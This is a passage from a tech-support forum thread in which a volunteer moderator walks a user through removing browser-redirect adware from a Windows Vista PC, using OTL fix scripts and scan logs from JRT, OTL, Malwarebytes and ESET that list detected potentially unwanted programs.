"{18455581-E099-4BA8-BC6B-F34B2F06600C}" = Google Toolbar for Internet Explorer
"{196467F1-C11F-4F76-858B-5812ADC83B94}" = MSXML 4.0 SP3 Parser
"{2227E1FA-01F5-483C-AB0E-2A308E900B3D}" = InterVideo FilterSDK for Hauppauge
"{2300EE96-0A41-4FAB-BD03-989EC44577A0}" = Acronis Disk Director Suite
"{2318C2B1-4965-11d4-9B18-009027A5CD4F}" = Google Toolbar for Internet Explorer
"{26A24AE4-039D-4CA4-87B4-2F83217055FF}" = Java 7 Update 55
"{28DB8373-C1BB-444F-A427-A55585A12ED7}" = Motorola Device Manager
"{36A345C9-0691-45A1-AEEF-29ECEC8B5014}" = Microsoft Security Client
"{3D3E663D-4E7E-4577-A560-7ECDDD45548A}" = PVSonyDll
"{4903D172-DCCB-392F-93A3-34CA9D47FE3D}" = Microsoft .NET Framework 4.5.1
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{5A0C892E-FD1C-4203-941E-0956AED20A6A}" = APC PowerChute Personal Edition
"{5B24ECDD-968F-4DF2-91E5-E4BFC7B72134}" = RSDLite
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{65DA2EC9-0642-47E9-AAE2-B5267AA14D75}" = Activation Assistant for the 2007 Microsoft Office suites
"{67ADE9AF-5CD9-4089-8825-55DE4B366799}" = NTI Backup NOW! 4.7
"{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}" = Windows Media Player Firefox Plugin
"{6C9FA746-8759-4040-A436-42922CB3492E}" = VistaBootPRO 3.3
"{6D52C408-B09A-4520-9B18-475B81D393F1}" = Microsoft Works
"{6ED53E0C-EAC0-4F0F-947D-6BA817E4C8C3}" = HostsMan 3.1.57
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
"{79DD56FC-DB8B-47F5-9C80-78B62E05F9BC}" = Acer ScreenSaver
"{7B63B2922B174135AFC0E1377DD81EC2}" =
"{81DE15C9-5390-4533-81DF-2DC936C1A40C}" = Motorola Device Software Update
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}" = NVIDIA PhysX
"{90140000-0011-0000-0000-0000000FF1CE}" = Microsoft Office Professional Plus 2010
"{90140000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2010
"{90140000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2010
"{90140000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2010
"{90140000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2010
"{90140000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2010
"{90140000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2010
"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010
"{90140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010
"{90140000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2010
"{90140000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2010
"{90140000-0044-0409-0000-0000000FF1CE}" = Microsoft Office InfoPath MUI (English) 2010
"{90140000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2010
"{90140000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2010
"{90140000-00BA-0409-0000-0000000FF1CE}" = Microsoft Office Groove MUI (English) 2010
"{90140000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2010
"{90140000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2010
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.1
"{933B4015-4618-4716-A828-5289FC03165F}" = VC80CRTRedist - 8.0.50727.6195
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AAF4238F-7C29-451D-9925-C753271A5728}" = Microsoft Visual C++ Run Time  Lib Setup
"{AC76BA86-7AD7-1033-7B44-A81300000003}" = Adobe Reader 8.1.5
"{AC76BA86-7AD7-1033-7B44-A81300000003}_814" = KB408682
"{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}" = QuickTime
"{B0255743-165B-4BD5-8DA8-37DFB9930012}" = Norton Ghost
"{B13A7C41581B411290FBC0395694E2A9}" = DivX Converter
"{B2544A03-10D0-4E5E-BA69-0362FFC20D18}" = OGA Notifier 2.0.0048.0
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision" = NVIDIA 3D Vision Driver 311.06
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel" = NVIDIA Control Panel 311.06
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver" = NVIDIA Graphics Driver 311.06
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB" = NVIDIA 3D Vision Controller Driver 310.70
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX" = NVIDIA PhysX System Software 9.12.1031
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update" = NVIDIA Update 1.11.3
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_installer" = NVIDIA Install Application
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NVIDIA.Update" = NVIDIA Update Components
"{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1" = Spybot - Search & Destroy
"{C3113E55-7BCB-4de3-8EBF-60E6CE6B2296}_is1" = SiSoftware Sandra Lite 2011
"{C5D706E3-BF18-4106-B02E-F55A7F22DDEE}" = TEW-805UB AC1200 Dual Band USB Adapter
"{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}" = SUPERAntiSpyware
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{CE386A4E-D0DA-4208-8235-BCE43275C694}" = LightScribe  1.4.142.1
"{D76D1828-BBA0-4BD9-8181-5ACC617DC5F2}" = Virtual Earth 3D (Beta)
"{DBA4DB9D-EE51-4944-A419-98AB1F1249C8}" = LiveUpdate Notice (Symantec Corporation)
"{E80F62FF-5D3C-4A19-8409-9721F2928206}" = LiveUpdate (Symantec Corporation)
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F35D5A5E-7739-49DB-8A0E-23E2E8F99D1A}" = Motorola Mobile Drivers Installation 5.9.0
"{F5266D28-E0B2-4130-BFC5-EE155AD514DC}" = Apple Application Support
"7-Zip" = 7-Zip 9.20
"Activation Assistant for the 2007 Microsoft Office suites" = Activation Assistant for the 2007 Microsoft Office suites
"Adobe Flash Player ActiveX" = Adobe Flash Player 13 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 13 Plugin
"Adobe Shockwave Player" = Adobe Shockwave Player 12.0
"ALchemy" = Creative ALchemy
"Android SDK Tools" = Android SDK Tools
"AudioCS" = Creative Audio Console
"CCleaner" = CCleaner
"Creative Software AutoUpdate" = Creative Software AutoUpdate
"DAEMON Tools Lite" = DAEMON Tools Lite
"DivX Setup" = DivX Setup
"ERUNT_is1" = ERUNT 1.1j
"getPlus®_ocx" = getPlus®_ocx
"Google Chrome" = Google Chrome
"Google Updater" = Google Updater
"ImgBurn" = ImgBurn
"InstallShield_{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}" = NTI CD & DVD-Maker
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware version 1.75.0.1300
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Microsoft Security Client" = Microsoft Security Essentials
"Mozilla Firefox 4.0 (x86 en-US)" = Mozilla Firefox 4.0 (x86 en-US)
"nanoPEG-Editor 2.6.0 for WinTV_is1" = nanoPEG-Editor 2.6.0 for WinTV
"NST" = Norton Safe Web Lite
"NVIDIA Display Control Panel" = NVIDIA Display Control Panel
"NVIDIA StereoUSB Driver" = NVIDIA 3D Vision Controller Driver
"NVIDIAStereo" = NVIDIA Stereoscopic 3D Driver
"Office14.PROPLUS" = Microsoft Office Professional Plus 2010
"OpenAL" = OpenAL
"OpenDNS Updater" = OpenDNS Updater 2.2.1
"PdaNet_is1" = PdaNet for Android 3.00
"PsuedoLiveUpdate" = LiveUpdate (Symantec Corporation)
"Revo Uninstaller" = Revo Uninstaller 1.95
"SAMSUNG Mobile Composite Device" = SAMSUNG Mobile Composite Device Software
"SAMSUNG Mobile Modem" = SAMSUNG Mobile Modem Driver Set
"Samsung Mobile phone USB driver" = Samsung Mobile phone USB driver Software
"SAMSUNG Mobile USB Modem" = SAMSUNG Mobile USB Modem Software
"SAMSUNG Mobile USB Modem 1.0" = SAMSUNG Mobile USB Modem 1.0 Software
"SpywareBlaster_is1" = SpywareBlaster 4.5
"TeamViewer 8" = TeamViewer 8
"Winamp" = Winamp
"Yahoo! Messenger" = Yahoo! Messenger
 
========== HKEY_CURRENT_USER Uninstall List ==========
 
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"Dropbox" = Dropbox
"Winamp Detect" = Winamp Detector Plug-in
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 5/20/2014 2:10:41 PM | Computer Name = Ken-Home | Source = System Restore | ID = 8193
Description =
 
 
< End of report >
 


  • 0

#5
Valinorum

    GeekU Guardian Bot

  • GeekU Moderator
  • 3,330 posts
You missed step 2. :)
  • 0

#6
Kenjesse

    Member

  • Topic Starter
  • 88 posts

Oops... sorry, did step 2, just missed posting the log:

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.1.4 (04.06.2014:1)
OS: Windows Vista ™ Home Premium x86
Ran by Ken on Tue 05/20/2014 at 14:02:32.88
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values

Successfully repaired: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\\DisplayName
Successfully repaired: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\\URL



~~~ Registry Keys



~~~ Files



~~~ Folders

Successfully deleted: [Folder] "C:\Users\Ken\appdata\locallow\boost_interprocess"
Successfully deleted: [Folder] "C:\Users\Ken\Local Settings\Application Data\cre"



~~~ FireFox

Successfully deleted the following from C:\Users\Ken\AppData\Roaming\mozilla\firefox\profiles\8agrx3pn.default\prefs.js

user_pref("google.toolbar.button_option.cached.gtbSearchBlogs", "<toolbarbutton xmlns=\"hxxp://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul\" id=\"gtbSearchBlogs\" t
user_pref("google.toolbar.button_option.cached.gtbSearchPhotos", "<toolbarbutton xmlns=\"hxxp://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul\" id=\"gtbSearchPhotos\"
user_pref("google.toolbar.button_option.cached.gtbSearchScholar", "<toolbarbutton xmlns=\"hxxp://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul\" id=\"gtbSearchScholar
user_pref("google.toolbar.button_option.cached.gtbstoolbar-google-com_CTK0Y7F4MTG6NKYH03WT-xml", "<toolbarbutton xmlns=\"hxxp://www.mozilla.org/keymaster/gatekeeper/there.is.o
user_pref("google.toolbar.button_option.cached.gtbstoolbar-google-com_J66T77NJDBMW4FEUU7FA-xml", "<toolbarbutton xmlns=\"hxxp://www.mozilla.org/keymaster/gatekeeper/there.is.o
user_pref("google.toolbar.search-icon", "data:image/x-icon;base64,AAABAAIAEBAAAAEAIABoBAAAJgAAACAgAAABACAAqBAAAI4EAAAoAAAAEAAAACAAAAABACAAAAAAAAAEAAASCwAAEgsAAAAAAAAAAAAA9IVCS
Emptied folder: C:\Users\Ken\AppData\Roaming\mozilla\firefox\profiles\8agrx3pn.default\minidumps [13 files]



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Tue 05/20/2014 at 14:07:38.97
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 


  • 0

#7
Valinorum

    GeekU Guardian Bot

  • GeekU Moderator
  • 3,330 posts
Hi Kenjesse, :)

Uninstall the following outdated programs and install their updated versions.
  • Adobe Reader 8.1.5 (Download latest version from here. Uncheck the optional offer.)
  • Malwarebytes Anti-Malware version 1.75.0.1300 (I will instruct you to install the latest version later.)
  • Mozilla Firefox 4.0 (x86 en-US) (Latest version available here.)
  • TeamViewer 8 (Latest version available here.)
Uninstall the following security programs which may cause problem with our fixes. You may install them again if you wish after I declare you clean.
  • Spybot - Search & Destroy
  • SUPERAntiSpyware
  • SpywareBlaster 4.5
 
  • Step #4 Fix with OTL
    • Re-run OTL by right clicking and choosing Run as administrator;
    • Under the Custom Scans/Fixes Box copy and paste the following contents inside the quote box. (Do not include the word 'quote').

      :Commands
      [createrestorepoint]

      :OTL
      O2 - BHO: (Spybot-S&D IE Protection) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
      O2 - BHO: (no name) - {83A2F9B1-01A2-4AA5-87D1-45B6B8505E96} - No CLSID value found.
      O4 - HKCU..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)
      O4 - HKCU..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE (SUPERAntiSpyware)
      O9 - Extra 'Tools' menuitem : Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
      O13 - gopher Prefix: missing
      O16 - DPF: {44990B00-3C9D-426D-81DF-AAB636FA4345} https://www-secure.s...abs/tgctlcm.cab (Reg Error: Key error.)
      O16 - DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} http://fpdownload.ma...r/ultrashim.cab (Reg Error: Key error.)
      O33 - MountPoints2\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\Shell - "" = AutoRun
      O33 - MountPoints2\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\Shell\AutoRun\command - "" = M:\LaunchU3.exe -a
      O33 - MountPoints2\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\Shell - "" = AutoRun
      O33 - MountPoints2\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\Shell\AutoRun\command - "" = J:\CTRun\Start.EXE
      O33 - MountPoints2\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\Shell - "" = AutoRun
      O33 - MountPoints2\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\Shell\AutoRun\command - "" = K:\LaunchU3.exe -a
      [3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
      [3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
      @Alternate Data Stream - 104 bytes -> C:\ProgramData\TEMP:5C321E34

      :Reg
      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
      "{7B63B2922B174135AFC0E1377DD81EC2}"=-

      :Commands
      [emptytemp]
      [resethosts]

    • Click on "Run Fix" and let the program run unhindered;
    • Your PC will reboot automatically and a log will be opened;
    • Please post it in your next reply.
 

How is your system running?

 
  • Required Log(s):
    • OTL Fix Log
Regards,
Valinorum
  • 0

#8
Kenjesse

    Member

  • Topic Starter
  • 88 posts

Programs updated or removed as requested, OTL fix complete, log follows. Am manually going to run ERUNT and reboot again for now but have not experienced any further redirects. Will follow up with more as to how system is running.

 

All processes killed
========== COMMANDS ==========
Restore point Set: OTL Restore Point
========== OTL ==========
Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{53707962-6F74-2D53-2644-206D7942484F}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{53707962-6F74-2D53-2644-206D7942484F}\ not found.
C:\Program Files\Spybot - Search & Destroy\SDHelper.dll moved successfully.
Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{83A2F9B1-01A2-4AA5-87D1-45B6B8505E96}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{83A2F9B1-01A2-4AA5-87D1-45B6B8505E96}\ not found.
Registry value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\SpybotSD TeaTimer not found.
File C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe not found.
Registry value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\SUPERAntiSpyware not found.
File C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{DFB852A3-47F8-48C4-A200-58CAB36FD2A2}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFB852A3-47F8-48C4-A200-58CAB36FD2A2}\ not found.
File C:\Program Files\Spybot - Search & Destroy\SDHelper.dll not found.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\gopher|:gopher:// /E : value set successfully!
Starting removal of ActiveX control {44990B00-3C9D-426D-81DF-AAB636FA4345}
C:\Windows\Downloaded Program Files\tgctlcm.inf moved successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{44990B00-3C9D-426D-81DF-AAB636FA4345}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{44990B00-3C9D-426D-81DF-AAB636FA4345}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44990B00-3C9D-426D-81DF-AAB636FA4345}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{44990B00-3C9D-426D-81DF-AAB636FA4345}\ not found.
Starting removal of ActiveX control {8FFBE65D-2C9C-4669-84BD-5829DC0B603C}
C:\Windows\Downloaded Program Files\erma.inf moved successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\ not found.
File M:\LaunchU3.exe -a not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\ not found.
File J:\CTRun\Start.EXE not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\ not found.
File K:\LaunchU3.exe -a not found.
C:\ProgramData\xml3F22.tmp deleted successfully.
C:\ProgramData\xml4D46.tmp deleted successfully.
C:\ProgramData\xml4EDC.tmp deleted successfully.
ADS C:\ProgramData\TEMP:5C321E34 deleted successfully.
========== REGISTRY ==========
Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\\{7B63B2922B174135AFC0E1377DD81EC2} not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7B63B2922B174135AFC0E1377DD81EC2}\ not found.
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: All Users
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Ken
->Temp folder emptied: 35074040 bytes
->Temporary Internet Files folder emptied: 175408690 bytes
->Java cache emptied: 305628 bytes
->FireFox cache emptied: 60085305 bytes
->Google Chrome cache emptied: 370225724 bytes
->Flash cache emptied: 2366 bytes
 
User: Public
 
User: UpdatusUser
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 5925063 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temp folder emptied: 0 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temporary Internet Files folder emptied: 0 bytes
RecycleBin emptied: 284481685 bytes
 
Total Files Cleaned = 888.00 mb
 
C:\Windows\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully
 
OTL by OldTimer - Version 3.2.69.0 log created on 05212014_092905

Files\Folders moved on Reboot...

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
 


  • 0

#9
Kenjesse

    Member

  • Topic Starter
  • 88 posts

Am getting two "Windows cannot open this file:" messages during bootup

 

File: Empowering Technology Launcher.Ink.disabled  (not sure what it is I'm thinking Acer related and not needed)

 

File: APC UPS Status.Ink.disabled (related to an APC UPS I am not currently using as the battery needs to be replaced and is not connected to system)

 

Otherwise am having no further problems with any browser, looking good to me at this point.


  • 0

#10
Valinorum

    GeekU Guardian Bot

  • GeekU Moderator
  • 3,330 posts
Hi Kenjesse, :)
  • Step #5 Scan with Malwarebytes' Anti-Malware
    • Download Malwarebytes' Anti-Malware from the suitable link below --
    • Double-click mbam-setup.exe to install the application.
    • Before clicking Finish perform the following actions --
      • Un-check the box beside Enable free trial of Malwarebytes Anti-Malware Premium.
      • Check the box beside Launch Malwarebytes Anti-Malware
    • Once the program has loaded, the MBAM dashboard will appear with an alert to update - click the green button Update Now;
    • Click on Setting--
      • Navigate to the tab Detection and Protection and check all the boxes under Detection Options
    • From the Dashboard click on Scan Now;
    • If threats are detected click on Apply actions. If the program asks to reboot your PC, let it do so;
    • On completion of the scan click on View Detailed Log after that click on Export Button, select Text File and save the log to your Desktop;
    • Copy and Paste the contents of the log in your next reply.
 
  • Step #6 ESET Online Scanner
    Disable your security programs, which include but are not limited to anti-virus, anti-malware, anti-spyware, et cetera. Peruse this for additional information.
    • Download esetsmartinstaller_enu.exe by clicking here.
    • Right-click on the program and choose Run as administrator.
    • Accept their terms and conditions and proceed.
    • Install Add-On/Active X if prompted.
    • From the Computer Scan Setting --
      • Uncheck the box beside Remove Found Threats;
      • Check the box beside Scan archives
    • Click on Advanced Setting and check the following boxes--
      • Scan for potentially unwanted applications
      • Scan for potentially unsafe applications
      • Enable Anti-Stealth Technology
    • Click on Start and wait for the virus signature database to update.
    • The online scan will begin automatically and can take several hours.
      • Note: Do not touch either the mouse or keyboard during the scan. Otherwise it may stall.
    • After the Scan finishes --
      • If no threats were found:
        • Put a checkmark in Uninstall application on close.
        • Close the program and report that nothing was found
      • If threats were found:
        • Open the file located in C:\Program Files\ESET\ESET Online Scanner\log.txt (32-bit) or C:\Program Files (x86)\ESET\ESET Online Scanner\log.txt (64-bit).
        • Copy and Paste contents of the log file in your next reply.
    Note: Enable your security programs afterwards.
 
  • Required Log(s):
    • Malwarebytes' Anti-Malware Log;
    • ESET Scan Log
Regards,
Valinorum
  • 0



#11
Kenjesse

    Member

  • Topic Starter
  • 88 posts

More logs follow:

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 5/21/2014
Scan Time: 1:16:56 PM
Logfile: MBAMLog.txt
Administrator: Yes

Version: 2.00.2.1012
Malware Database: v2014.05.21.07
Rootkit Database: v2014.03.27.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows Vista Service Pack 2
CPU: x86
File System: NTFS
User: Ken

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 277867
Time Elapsed: 13 min, 57 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 4
PUP.Optional.ShoppingGate.A, C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_inst.shoppingate.info_0.localstorage, Quarantined, [9d637789e51b45bbfd8f7e0a90725fa1],
PUP.Optional.ShoppingGate.A, C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_inst.shoppingate.info_0.localstorage-journal, Quarantined, [e31ddb25ce32b54b820ab3d54db5f20e],
PUP.Optional.Superfish.A, C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_www.superfish.com_0.localstorage, Quarantined, [04fc16eabf4113ed2ac4e0a88d753cc4],
PUP.Optional.Superfish.A, C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_www.superfish.com_0.localstorage-journal, Quarantined, [48b88c7406fa827e0be30187689a6b95],

Physical Sectors: 0
(No malicious items detected)


(end)

 

ESETSmartInstaller@High as downloader log:
all ok
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6920
# api_version=3.0.2
# EOSSerial=0f2a595cec75654390d8b43b971a7495
# engine=18354
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2014-05-21 09:56:48
# local_time=2014-05-21 05:56:48 (-0500, Eastern Daylight Time)
# country="United States"
# lang=1033
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode=5892 16776574 100 100 118722659 237316936 0 0
# scanned=290789
# found=38
# cleaned=0
# scan_time=15414
sh=77801D0E0DC02E8C50CDC73562F4D7F13FC1C18B ft=0 fh=0000000000000000 vn="Win32/Conduit.SearchProtect.A potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SearchProtect\ffprotect\application.js.vir"
sh=A696C5A0D50145AFDE3D3A71F70B1C3006AC2199 ft=1 fh=da0003b6601dbc17 vn="a variant of Win32/Adware.MultiPlug.I application" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Vaudix\510db82b7b061.dll.vir"
sh=F7A7398712BC2E31AF290FB2422486B28E6FD181 ft=0 fh=0000000000000000 vn="Win32/Adware.MultiPlug.H application" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\knfhfghnfdabbalddnnbdjmjomfgjbog\1\510db82b7ae502.52047167.js.vir"
sh=93510E07EBD463BE51052EC8114EC16C5423103E ft=0 fh=0000000000000000 vn="Win32/Conduit.SearchProtect.A potentially unwanted application" ac=I fn="C:\Program Files\Mozilla Firefox\components\sprotector.js"
